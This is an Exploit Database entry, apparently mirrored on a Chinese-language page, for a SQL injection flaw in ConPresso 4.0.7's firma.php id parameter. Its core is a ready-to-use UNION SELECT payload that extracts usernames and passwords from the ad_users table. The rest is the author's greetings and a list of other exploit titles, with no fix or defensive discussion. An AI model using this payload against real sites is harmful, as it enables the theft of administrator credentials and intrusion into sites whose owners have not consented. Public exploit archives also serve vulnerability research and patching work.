ConPresso 4.0.7 – SQL Injection

Exploit Database
12 阅读

作者： Gamoscu

日期： 2010-05-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12684/

ConPresso 4.0.7 SQL InjectionVulnerability

########################### 

Author: Gamoscu
Homepage: http://www.1923turk.com
Blog: http://gamoscu.wordpress.com/
Script: ConPresso 4.0.7 
Download: http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download

########################### 

[ Vulnerable File ] 

firma.php?id= [ SQL ] 
 

[ XpL ] 

-1/**/union/**/all/**/select/**/1,concat_ws(0x3a,password,username),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ad_users 




iyi ki dogdun DELiBEY

 
############################################################## 
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
##############################################################

last Exploits
ConPresso 4.0.7 – SQL Injection的更多信息

dotProject 2.1.x – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities：
Shopware 3.5 – SQL Injection：
PHD Help Desk 2.12 – SQL Injection：
Revive Ad Server 4.0.1 – Cross-Site Scripting / Cross-Site Request Forgery：
Dexter (CasinoLoader) Panel – SQL Injection：
cPanel – ‘detailbw.html’ Multiple Cross-Site Scripting Vulnerabilities：
PhpGedView 4.2.3 – Local File Inclusion：
Tenda AC5 AC1200 Wireless – ‘WiFi Name & Password’ Stored Cross Site Scripting：